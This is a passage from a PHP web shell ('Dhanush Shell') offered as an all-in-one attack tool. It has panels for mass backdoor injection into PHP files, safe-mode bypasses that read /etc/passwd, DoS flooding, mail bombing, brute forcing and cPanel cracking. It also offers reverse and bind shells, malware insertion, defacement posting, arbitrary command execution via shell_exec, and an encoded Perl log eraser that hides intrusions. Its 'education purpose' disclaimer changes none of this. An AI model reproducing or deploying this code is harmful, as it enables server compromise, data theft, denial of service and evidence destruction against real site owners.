4827 <td>Create A backdoor by injecting this code in every php file of current directory</td>
4828 </tr>
4829
4830 <tr>
4831 <td colspan="2"><?php if($os == "Windows"){echo "<i>Default Password is : <b>Dhanush</b> (change to yours using MD5)</i> Example : .php?dhpasswd=Dhanush";}else{if(!function_exists('system')){echo "system() function disabled";}} ?><BR>
4832 <textarea name="injectthis" cols="110" rows="10" class="box"><?php echo base64_decode($injectcode); ?></textarea>
4833 </td>
4834 </tr>
4835 <tr>
4836 <td rowspan="2">
4837 <input style="margin : 20px; margin-left: 390px; padding : 10px; width: 100px;" type="button" onClick="codeinjector(pathtomass.value,mode.value,filetype.value,injectthis.value)" class="but" value="Inject "/>
4838 </td>
4839 </tr>
4840 </form>
4841 </table><div id="showinject"</div>
4842 <?php
4843}
4844// Bypass
4845else if(isset($_GET["bypass"]))
4846{
4847 ?><center><div id="showmydata"></div></center>
4848 <table cellpadding="7" align="center" border="3" style="width:70%;border-color:#333333;border-collapse:collapse;">
4849 <tr>
4850 <td align="center" colspan="2"><font size="3">Safe mode bypass</font></td>
4851 </tr>
4852 <tr>
4853 <td align="center">
4854 <p>Using copy() function</p>
4855 <form onSubmit="bypassfun('copy',copy.value);return false;">
4856 <input type="text" name="copy" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('copy',copy.value)" value="bypass" class="but">
4857 </form>
4858 </td>
4859 <td align="center">
4860 <p>Using File contents function</p>
4861 <form onSubmit="bypassfun('filecontents',filecontents.value);return false;">
4862 <input type="text" name="filecontents" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('filecontents',filecontents.value)" value="bypass" class="but">
4863 </form>
4864 </td>
4865 </tr>
4866
4867 <tr>
4868 <td align="center">
4869 <p>Using Stream contents function</p>
4870 <form onSubmit="bypassfun('stream',stream.value);return false;">
4871 <input type="text" name="stream" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('stream',stream.value)" value="bypass" class="but">
4872 </form>
4873 </td>
4874 <td align="center">
4875 <p>Using Curl() function</p>
4876 <form onSubmit="bypassfun('curl',curl.value);return false;">
4877 <input type="text" name="curl" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('curl',curl.value)" value="bypass" class="but">
4878 </form>
4879 </td>
4880 </tr>
4881
4882 <tr>
4883 <td align="center">
4884 <p>Bypass using include()</p>
4885 <form onSubmit="bypassfun('include',include.value);return false;">
4886 <input type="text" name="include" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('include',include.value)" value="bypass" class="but">
4887 </form>
4888 </td>
4889 <td align="center">
4890 <p>Using id() function</p>
4891 <form onSubmit="bypassfun('id',id.value);return false;">
4892 <input type="text" name="id" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('id',id.value)" value="bypass" class="but">
4893 </form>
4894 </td>
4895 </tr>
4896
4897 <tr>
4898 <td align="center">
4899 <p>Using tempnam() function</p>
4900 <form onSubmit="bypassfun('tempnam',tempname.value);return false;">
4901 <input type="text" name="tempname" value="../../../etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('tempnam',tempname.value)" value="bypass" class="but">
4902 </form>
4903 </td>
4904 <td align="center">
4905 <p>Using symlink() function</p>
4906 <form onSubmit="bypassfun('symlnk',sym.value);return false;">
4907 <input type="text" name="sym" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('symlnk',sym.value)" value="bypass" class="but">
4908 </form>
4909 </td>
4910 </tr>
4911 <tr>
4912 <td colspan=2 align="center">
4913 <p>Using Bypass function</p>
4914 <form onSubmit="bypassfun('newtype',newtype.value,optiontype.value);return false;">
4915 <input type="text" name="newtype" value="/etc/passwd" class="sbox">
4916 <select id="optiontype" class=sbox>
4917 <option value="tac">tac</option>
4918 <option value="more">more</option>
4919 <option value="less">less</option>
4920 <option value="rev">rev</option>
4921 <option value="xxd">xxd</option>
4922 <option value="awk">awk</option>
4923 </select>
4924 <input type="button" OnClick="bypassfun('newtype',newtype.value,optiontype.value)" value="bypass" class="but">
4925 </form>
4926 </td>
4927
4928 </tr>
4929 </table>
4930 </form>
4931 <?php
4932}
4933//fuzzer
4934else if(isset($_GET['fuzz']))
4935{
4936 ?>
4937 <form method="GET">
4938 <table id="margins">
4939 <tr>
4940 <td width="400" class="title">
4941 IP
4942 </td>
4943 <td>
4944 <input class="box" name="myip" value="127.0.0.1" onFocus="if(this.value == '127.0.0.1')this.value = '';" onBlur="if(this.value=='')this.value='127.0.0.1';"/>
4945 </td>
4946 </tr>
4947
4948 <tr>
4949 <td class="title">
4950 Port
4951 </td>
4952 <td>
4953 <input class="box" name="port" value="80" onFocus="if(this.value == '80')this.value = '';" onBlur="if(this.value=='')this.value='80';"/>
4954 </td>
4955 </tr>
4956
4957 <tr>
4958 <td class="title">
4959 Timeout
4960 </td>
4961 <td>
4962 <input type="text" class="box" name="time" value="5" onFocus="if(this.value == '5')this.value = '';" onBlur="if(this.value=='')this.value='5';"/>
4963 </td>
4964 </tr>
4965
4966
4967 <tr>
4968 <td class="title">
4969 No of times
4970 </td>
4971 <td>
4972 <input type="text" class="box" name="times" value="100" onFocus="if(this.value == '100')this.value = '';" onBlur="if(this.value=='')this.value='100';" />
4973 </td>
4974 </tr>
4975
4976 <tr>
4977 <td class="title">
4978 Message (The message Should be long and it will be multiplied with the value after it)
4979 </td>
4980 <td>
4981 <input class="box" name="message" value="%S%x--Some Garbage here --%x%S" onFocus="if(this.value == '%S%x--Some Garbage here --%x%S')this.value = '';" onBlur="if(this.value=='')this.value='%S%x--Some Garbage here --%x%S';"/>
4982 </td>
4983 <td>
4984 x
4985 </td>
4986 <td width="20">
4987 <input style="width: 30px;" class="box" name="messageMultiplier" value="10" />
4988 </td>
4989 </tr>
4990
4991 <tr>
4992 <td rowspan="2">
4993 <input style="margin : 20px; margin-left: 500px; padding : 10px; width: 100px;" type="button" onClick="dos('fuzzer',myip.value,port.value,time.value,times.value,message.value,messageMultiplier.value)" class="but" value=" Submit "/>
4994 </td>
4995 </tr>
4996 </table>
4997 </form><div id="showdos"></div>
4998 <?php
4999}
5000// Zone-h Poster
5001 else if(isset($_GET["zone"]))
5002 {
5003 if(!function_exists('curl_version'))
5004 {
5005 echo "<pre style='margin-top:5px'><center><font >PHP CURL NOT EXIST</font></center></pre>";
5006 }
5007 ?>
5008 <center><font size="4">Zone-h Poster</font></center>
5009 <form action="<?php echo $self; ?>" method="post">
5010 <table align="center" cellpadding="5" border="0">
5011 <tr>
5012 <td>
5013 <input type="text" name="defacer" value="Attacker" class="box" /></td></tr>
5014 <tr><td>
5015 <select name="hackmode" class="box">
5016 <option >--------SELECT--------</option>
5017 <option value="1">known vulnerability (i.e. unpatched system)</option>
5018 <option value="2" >undisclosed (new) vulnerability</option>
5019 <option value="3" >configuration / admin. mistake</option>
5020 <option value="4" >brute force attack</option>
5021 <option value="5" >social engineering</option>
5022 <option value="6" >Web Server intrusion</option>
5023 <option value="7" >Web Server external module intrusion</option>
5024 <option value="8" >Mail Server intrusion</option>
5025 <option value="9" >FTP Server intrusion</option>
5026 <option value="10" >SSH Server intrusion</option>
5027 <option value="11" >Telnet Server intrusion</option>
5028 <option value="12" >RPC Server intrusion</option>
5029 <option value="13" >Shares misconfiguration</option>
5030 <option value="14" >Other Server intrusion</option>
5031 <option value="15" >SQL Injection</option>
5032 <option value="16" >URL Poisoning</option>
5033 <option value="17" >File Inclusion</option>
5034 <option value="18" >Other Web Application bug</option>
5035 <option value="19" >Remote administrative panel access bruteforcing</option>
5036 <option value="20" >Remote administrative panel access password guessing</option>
5037 <option value="21" >Remote administrative panel access social engineering</option>
5038 <option value="22" >Attack against administrator(password stealing/sniffing)</option>
5039 <option value="23" >Access credentials through Man In the Middle attack</option>
5040 <option value="24" >Remote service password guessing</option>
5041 <option value="25" >Remote service password bruteforce</option>
5042 <option value="26" >Rerouting after attacking the Firewall</option>
5043 <option value="27" >Rerouting after attacking the Router</option>
5044 <option value="28" >DNS attack through social engineering</option>
5045 <option value="29" >DNS attack through cache poisoning</option>
5046 <option value="30" >Not available</option>
5047 </select>
5048 </td></tr>
5049 <tr><td>
5050 <select name="reason" class="box">
5051 <option >--------SELECT--------</option>
5052 <option value="1" >Heh...just for fun!</option>
5053 <option value="2" >Revenge against that website</option>
5054 <option value="3" >Political reasons</option>
5055 <option value="4" >As a challenge</option>
5056 <option value="5" >I just want to be the best defacer</option>
5057 <option value="6" >Patriotism</option>
5058 <option value="7" >Not available</option>
5059 </select></td></tr>
5060 <tr><td>
5061 <textarea name="domain" class="box" cols="47" rows="9">List Of Domains</textarea></td></tr>
5062 <tr><td>
5063 <input type="button" onClick="zoneh(defacer.value,hackmode.value,reason.value,domain.value)" class="but" value="Send Now !" /></td></tr></table>
5064 </form><div id="showzone"></div>
5065 <?php }
5066//DDos
5067 else if(isset($_GET['dos']))
5068 {
5069 ?>
5070 <form method="GET">
5071 <table id="margins">
5072 <tr>
5073 <td width="400" class="title">
5074 IP
5075 </td>
5076 <td>
5077 <input class="box" name="myip" value="127.0.0.1" onFocus="if(this.value == '127.0.0.1')this.value = '';" onBlur="if(this.value=='')this.value='127.0.0.1';"/>
5078 </td>
5079 </tr>
5080
5081 <tr>
5082 <td class="title">
5083 Port
5084 </td>
5085 <td>
5086 <input class="box" name="port" value="80" onFocus="if(this.value == '80')this.value = '';" onBlur="if(this.value=='')this.value='80';"/>
5087 </td>
5088 </tr>
5089
5090 <tr>
5091 <td class="title">
5092 Timeout <font >(Time in seconds)</font>
5093 </td>
5094 <td>
5095 <input type="text" class="box" name="timeout" value="5" onFocus="if(this.value == '5')this.value = '';" onBlur="if(this.value=='')this.value='5';" />
5096 </td>
5097 </tr>
5098 <tr>
5099 <td class="title">
5100 Execution Time <font >(Time in seconds)</font>
5101 </td>
5102 <td>
5103 <input type="text" class="box" name="exTime" value="10" onFocus="if(this.value == '10')this.value = '';" onBlur="if(this.value=='')this.value='10';"/>
5104 </td>
5105 </tr>
5106 <tr>
5107 <td class="title">
5108 No of Bytes per/packet
5109 </td>
5110 <td>
5111 <input type="text" class="box" name="noOfBytes" value="999999" onFocus="if(this.value == '999999')this.value = '';" onBlur="if(this.value=='')this.value='999999';"/>
5112 </td>
5113 </tr>
5114 <tr>
5115 <td rowspan="2">
5116 <input style="margin : 20px; margin-left: 500px; padding : 10px; width: 100px;" type="button" onClick="dos('dosser',myip.value,port.value,timeout.value,exTime.value,noOfBytes.value,'null')" class="but" value=" Attack >> "/>
5117 </td>
5118 </tr>
5119 </table>
5120 </form><div id="showdos"></div>
5121 <?php
5122}
5123else if(isset($_GET['mailbomb']))
5124{ ?>
5125 <center><table><tr><td><a href=javascript:void(0) onClick="getdata('bomb')"><font class=txt size="4">| Mail Bomber |</font></a></td>
5126 <td><a href=javascript:void(0) onClick="getdata('mail')"><font class=txt size="4">| Mass Mailer |</font></a></td></tr></table></center><br><div id=showdata></div>
5127<?php
5128}
5129else if(isset($_GET['tools']))
5130 {
5131 ?>
5132 <center><br><form onSubmit="getport(host.value,protocol.value);return false;">
5133 <table cellpadding="5" border="3" style="border-color:#333333; width:50%;">
5134 <tr>
5135 <td colspan="2" align="center"><b><font size='4'>Port Scanner<br></font></b></td>
5136 </tr>
5137 <tr>
5138 <td align="center">
5139 <input class="sbox" type='text' name='host' value='<?php echo $_SERVER["SERVER_ADDR"]; ?>' >
5140 </td>
5141 <td align="center">
5142 <select class="sbox" name='protocol'>
5143 <option value='tcp'>tcp</option>
5144 <option value='udp'>udp</option>
5145 </select>
5146 </td>
5147 <tr>
5148 <td colspan="2" align="center"><input class="but" type='button' onClick="getport(host.value,protocol.value)" value='Scan Ports'></td>
5149 </tr>
5150 </form>
5151 <tr><td colspan=2><div id="showports"></div>
5152 </td></tr></table>
5153
5154 <br>
5155 <form onSubmit="bruteforce(prototype.value,serverport.value,login.value,dict.value);return false;">
5156 <table cellpadding="5" border="2" style="border-color:#333333; width:50%;">
5157 <tr>
5158 <td colspan="2" align="center"><font size="4">BruteForce</font></td>
5159 </tr>
5160 <tr>
5161 <td>Type : </td>
5162 <td>
5163 <select name="prototype" class="sbox">
5164 <option value="ftp">FTP</option>
5165 <option value="mysql">MYSQL</option>
5166 <option value="postgresql">PostgreSql</option>
5167 </select>
5168 </td>
5169 </tr>
5170 <tr>
5171 <td>Server <b>:</b> Port : </td>
5172 <td><input type="text" name="serverport" value="<?php echo $_SERVER["SERVER_ADDR"]; ?>" class="sbox"></td>
5173 </tr>
5174 <tr>
5175 <td valign="middle">Brute type : </td>
5176 <td><label><input type=radio name=mytype value="1" checked> /etc/passwd</label><label><input type=checkbox id="reverse" name=reverse value=1 checked> reverse (login -> nigol)</label><hr color="#1B1B1B">
5177 <label><input type=radio name=mytype value="2"> Dictionary</label><br>
5178 Login : <input type="text" name="login" value="root" class="sbox"><br>
5179 Dictionary : <input type="text" name="dict" value="<?php echo getcwd() . $directorysperator; ?>passwd.txt" class="sbox">
5180 </td>
5181 </tr>
5182 <tr>
5183 <td colspan="2" align="center"><input type="button" onClick="bruteforce(prototype.value,serverport.value,login.value,dict.value)" value="Attack >>" class="but"></td>
5184 </tr>
5185 </form><tr><td colspan="2" id="showbrute"></td></tr>
5186 </table>
5187 </center><br>
5188 <?php
5189}
5190else if (isset($_GET["phpc"]))
5191{
5192 ?>
5193 <div id="showresult"></div>
5194 <form name="frm">
5195 <textarea name="code" class="box" cols="120" rows="10">phpinfo();</textarea>
5196 <br /><br />
5197 <input name="submit" value="Execute This COde! " class="but" onClick="execode(code.value)" type="button" />
5198 <label><input type="checkbox" id="intext" name="intext" value="disp"> <font class=txt size="3">Display in Textarea</font></label>
5199 </form>
5200 <?php
5201}
5202else if(isset($_GET["exploit"]))
5203{
5204 if(!isset($_GET["rootexploit"]))
5205 {
5206 ?>
5207 <center>
5208 <form action="<?php echo $self; ?>" method="get" target="_blank">
5209 <input type="hidden" name="exploit">
5210 <table border="1" cellpadding="5" cellspacing="4" style="width:50%;border-color:#333333;">
5211 <tr>
5212 <td style="height:60px;">
5213 <font size="4" class=txt>Select Website</font></td><td>
5214 <p><select id="rootexploit" name="rootexploit" class="box">
5215 <option value="exploit-db">Exploit-db</option>
5216 <option value="packetstormsecurity">Packetstormsecurity</option>
5217 <option value="exploitsearch">Exploitsearch</option>
5218 <option value="shodanhq">Shodanhq</option>
5219 </select></p></td></tr><tr><td colspan="2" align="center" style="height:40px;">
5220 <input type="submit" value="Search" class="but"></td></tr></table>
5221 </form></center><br>
5222
5223 <?php
5224 }
5225 else
5226 {
5227 //exploit search
5228 $Lversion = php_uname(r);
5229 $OSV = php_uname(s);
5230 if(eregi('Linux',$OSV))
5231 {
5232 $Lversion=substr($Lversion,0,6);
5233 if($_GET['rootexploit'] == "exploit-db")
5234 {
5235 header("Location:http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$Lversion&filter_exploit_text=&filter_author=&filter_platform=16&filter_type=2&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=");
5236 }
5237 else if($_GET['rootexploit'] == "packetstormsecurity")
5238 {
5239 header("Location:http://www.packetstormsecurity.org/search/?q=Linux+Kernel+$Lversion");
5240 }
5241 else if($_GET['rootexploit'] == "exploitsearch")
5242 {
5243 header("Location:http://exploitsearch.com/search.html?cx=000255850439926950150%3A_vswux9nmz0&cof=FORID%3A10&q=Linux+Kernel+$Lversion");
5244 }
5245 else if($_GET['rootexploit'] == "shodanhq")
5246 {
5247 header("Location:https://exploits.shodan.io/?q=$Lversion+platform:\"linux\"");
5248 }
5249 }
5250 else
5251 {
5252 $Lversion=substr($Lversion,0,3);
5253 if($_GET['rootexploit'] == "exploit-db")
5254 {
5255 header("Location:http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$OSV&filter_exploit_text=&filter_author=&filter_platform=16&filter_type=2&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=");
5256 }
5257 else if($_GET['rootexploit'] == "packetstormsecurity")
5258 {
5259 header("Location:http://www.packetstormsecurity.org/search/?q=$OSV+Lversion");
5260 }
5261 else if($_GET['rootexploit'] == "exploitsearch")
5262 {
5263 header("Location:http://exploitsearch.com/search.html?cx=000255850439926950150%3A_vswux9nmz0&cof=FORID%3A10&q=$OSV+Lversion");
5264 }
5265 else if($_GET['rootexploit'] == "shodanhq")
5266 {
5267 header("Location:https://exploits.shodan.io/?q=$OSV+platform:\"windows\"");
5268 }
5269 }
5270 //End of Exploit search
5271 }
5272}
5273// Connect
5274else if(isset($_REQUEST['connect']))
5275{
5276 ?>
5277 <form action='<?php echo $self; ?>' method='POST' >
5278 <table style="width:50%" align="center" >
5279 <tr>
5280 <th colspan="1" width="50px">Reverse Shell</th>
5281 <th colspan="1" width="50px">Bind Shell</th>
5282 </tr>
5283 <tr>
5284 <td>
5285 <table style="border-spacing: 6px;">
5286 <tr>
5287 <td>IP </td>
5288 <td>
5289 <input type="text" class="box" style="width: 200px;" name="ip" value="<?php yourip();?>" />
5290 </td>
5291 </tr>
5292 <tr>
5293 <td>Port </td>
5294 <td><input style="width: 200px;" class="box" name="port" size='5' value="9891"/></td>
5295 </tr>
5296 <tr>
5297 <td style="vertical-align:top;">Use:</td>
5298 <td><select style="width: 95px;" name="lang" class="sbox">
5299 <option value="perl">Perl</option>
5300 <option value="python">Python</option>
5301 <option value="php">PHP</option>
5302 </select>
5303 <input type="submit" style="width: 90px;" class="but" value="Connect!" name="backconnect"/></td>
5304 </tr>
5305 </table> </form>
5306 </td>
5307
5308 <td style="vertical-align:top;">
5309 <form method='post' >
5310 <table style="border-spacing: 6px;">
5311 <tr>
5312 <td>Port</td>
5313 <td>
5314 <input style="width: 200px;" class="box" name="port" value="9891" />
5315 </td>
5316 </tr>
5317 <tr>
5318 <td>Password </td>
5319 <td>
5320 <input style="width: 200px;" class="box" name="passwd" value="Dhanush"/>
5321 </td>
5322 <tr>
5323 <td>Using</td>
5324 <td>
5325 <select style="width: 95px;" name="lang" id="lang" class="sbox">
5326 <option value="perl">Perl</option>
5327 <option value="c">C</option>
5328 </select>
5329 <input style="width: 90px;" class="but" type="submit" name="backdoor" value=" Bind "/></td>
5330 </tr>
5331 </table>
5332 </td>
5333 </form>
5334 </tr>
5335 <tr><td colspan=2>Click "Connect" only after open port for it.Use NetCat, run "nc -l -n -v -p 9891"!<br>Click "Bind", use netcat and give it the command 'nc <?php yourip(); ?> 9891"!</td></tr>
5336 </table>
5337
5338 <?php
5339 }
5340else if(isset($_REQUEST['subdomain']))
5341{
5342 ?>
5343 <center><form>
5344 <table>
5345 <tr>
5346 <td>Cpanel user : </td>
5347 <td><input type="text" name="cpaneluser" value="<?php echo get_current_user(); ?>" class="box" /></td>
5348 </tr>
5349 <tr>
5350 <td>Cpanel password : </td>
5351 <td><input type="password" name="cpanelpass" class="box" /></td>
5352 </tr>
5353 <tr>
5354 <td>Number of Subdomain : </td>
5355 <td><input type="text" name="noofsubdomain" class="box" value="10" /></td>
5356 </tr>
5357 <tr>
5358 <td valign="top">Index : </td>
5359 <td><textarea rows="7" cols="54" name="subindex" class="box">You just got Hacked</textarea></td>
5360 </tr>
5361 <tr>
5362 <td></td>
5363 <td><input type="button" value=" go " class="but" onClick="createsubdomain(cpaneluser.value,cpanelpass.value,noofsubdomain.value,subindex.value)" /></td>
5364 </tr>
5365 </table></center></form><br>
5366 <div id="showmydata"></div>
5367 <?php
5368}
5369else if(isset($_REQUEST['404']))
5370{
5371 ?>
5372 <center><table><tr><td><a href=javascript:void(0) onClick="getdata('404new')"><font class=txt size="4">| Set Your 404 Page |</font></a></td>
5373 <td><a href=javascript:void(0) onClick="getdata('404page')"><font class=txt size="4">| Set Specified 404 Page |</font></a></td>
5374 </tr></table></center><br>
5375 <div id="showdata"></div>
5376 <?php
5377}
5378else if(isset($_GET['about']))
5379 { ?>
5380
5381 <font class="om">Dhanush Shell is a PHP Script, created for checking the vulnerability and security of any web server or website. With this PHP script, the owner can check various vulnerablities present in the web server. This shell provide you almost every facility that the security analyst need for penetration testing. This is a "All In One" php script, so that the user do not need to go anywhere else.<br> This script is coded by an Indian Ethical Hacker.<br> This script is only coded for education purpose or testing on your own server. The developer of the script is not responsible for any damage or misuse of it.</font><br><br><center><font size=5>GREETZ To All Indian Hackers</font><br><font size=6>| जय महाकाल | | जय हिन्द |</font></center><br>
5382 <?php }
5383else if(isset($_GET['database']))
5384{ ?>
5385 <form onSubmit="mydatabase(server.value,username.value,password.value);return false;">
5386 <table id="datatable" style="width:90%;" cellpadding="4" align="center">
5387 <tr>
5388 <td colspan="2">Connect To Database</td>
5389 </tr>
5390 <tr>
5391 <td>Server Address :</td>
5392 <td><input type="text" class="box" name="server" value="localhost"></td>
5393 </tr>
5394 <tr>
5395 <td>Username :</td>
5396 <td><input type="text" class="box" name="username" value="root"></td>
5397 </tr>
5398 <tr>
5399 <td>Password:</td>
5400 <td><input type="text" class="box" name="password" value=""></td>
5401 </tr>
5402
5403 <tr>
5404 <td></td>
5405 <td><input type="button" onClick="mydatabase(server.value,username.value,password.value)" value=" Connect " name="executeit" class="but"></td>
5406 </tr>
5407 </table>
5408 </form>
5409 <div id="showsql"></div>
5410<?php
5411}
5412// Cpanel Cracker
5413 else if(isset($_REQUEST['cpanel']))
5414 {
5415 $cpanel_port="2082";
5416 $connect_timeout=5;
5417 ?>
5418 <center>
5419 <form method=post>
5420 <table class="btmtbl" style="width:50%;" border=1 cellpadding=4>
5421 <tr>
5422 <td align=center>User names</td><td align=center>Password</td>
5423 </tr>
5424 <tr>
5425 <td align=center><textarea name=username rows=25 cols=22 class=box><?php
5426 if($os != "Windows")
5427 {
5428 if(@file('/etc/passwd'))
5429 {
5430 $users = file('/etc/passwd');
5431 foreach($users as $user)
5432 {
5433 $user = explode(':', $user);
5434 echo $user[0] . "\n";
5435 }
5436 }
5437 else
5438 {
5439 $temp = "";
5440 $val1 = 0;
5441 $val2 = 1000;
5442 for(;$val1 <= $val2;$val1++)
5443 {
5444 $uid = @posix_getpwuid($val1);
5445 if ($uid)
5446 $temp .= join(':',$uid)."\n";
5447 }
5448
5449 $temp = trim($temp);
5450
5451 if($file5 = fopen("test.txt","w"))
5452 {
5453 fputs($file5,$temp);
5454 fclose($file5);
5455
5456 $file = fopen("test.txt", "r");
5457 while(!feof($file))
5458 {
5459 $s = fgets($file);
5460 $matches = array();
5461 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
5462 $matches = str_replace("home/","",$matches[1]);
5463 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
5464 continue;
5465 echo $matches;
5466 }
5467 fclose($file);
5468 }
5469 }
5470 }
5471
5472 ?></textarea></td><td align=center><textarea name=password rows=25 cols=22 class=box></textarea></td>
5473 </tr>
5474 <tr>
5475 <td align=center colspan=2><input type="submit" name="cpanelattack" value=" Go " class=but></td>
5476 </tr>
5477 </table>
5478 </form>
5479 </center>
5480 <?php
5481}
5482else if(isset($_REQUEST['malattack']))
5483{
5484 ?><input type="hidden" id="malpath" value="<?php echo $_GET["dir"]; ?>">
5485 <center><table><tr><td><a href=# onClick="getdata('malware')"><font class=txt size="4">| Malware Attack |</font></a></td>
5486 <td><a href=# onClick="getdata('codeinsert')"><font class=txt size="4">| Insert Own Code |</font></a></td></tr></table></center><br>
5487 <div id="showdata"></div>
5488 <?php
5489}
5490else if(isset($_GET["com"]))
5491{
5492 echo "<br>";
5493 ob_start();
5494 eval("phpinfo();");
5495 $b = ob_get_contents();
5496 ob_end_clean();
5497 $a = strpos($b,"<body>")+6; // yeah baby,, your body is wonderland ;-)
5498 $z = strpos($b,"</body>");
5499 $s_result = "<div class='myphp'>".substr($b,$a,$z-$a)."</div>";
5500 echo $s_result;
5501}
5502else if(isset($_GET['execute']))
5503{
5504 $comm = $_GET['execute'];
5505 chdir($_GET['executepath']);
5506 $check = shell_exec($comm);
5507
5508 echo "<BR><center><textarea id=showexecute cols=100 rows=20 class=box>" . $check . "</textarea></center>";
5509
5510 ?>
5511 <BR><BR><center><form onSubmit="executemyfn('<?php echo addslashes($_GET['executepath']); ?>',execute.value);return false;">
5512 <input type="text" class="box" name="execute">
5513 <input type="button" onClick="executemyfn('<?php echo addslashes($_GET['executepath']); ?>',execute.value)" value="Execute" class="but">
5514 <input type="button" onClick="cancel()" value="cancel" class="but" /></form></center><BR>
5515 <?php
5516}
5517else if(isset($_GET['mycmd']))
5518{
5519 if($_GET['mycmd']=="logeraser")
5520 {
5521 $erase = gzinflate(base64_decode("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"));
5522 if(is_writable("."))
5523 {
5524 if($openp = fopen(getcwd()."/logseraser.pl", 'w'))
5525 {
5526 fwrite($openp, $erase);
5527 fclose($openp);
5528 passthru("perl logseraser.pl linux");
5529 unlink("logseraser.pl");
5530 echo "<center><font color=#FFFFFF size=3>Logs Cleared</font></center>";
5531 }
5532 } else
5533 {
5534 if($openp = fopen("/tmp/logseraser.pl", 'w'))
5535 {
5536 fwrite($openp, $erase)or die("Error");
5537 fclose($openp);
5538 $aidx = passthru("perl logseraser.pl linux");
5539 unlink("logseraser.pl");
5540 echo "<center><font color=#FFFFFF size=3>Logs Cleared</font></center>";
5541 }
5542 }
5543 }
5544 else
5545 {
5546 $check = shell_exec($_GET['mycmd']);
5547 echo "<center><textarea cols=120 rows=20 class=box>" . $check . "</textarea></center>";
5548
5549 }
5550}
5551else if(isset($_GET['prototype']))
5552{
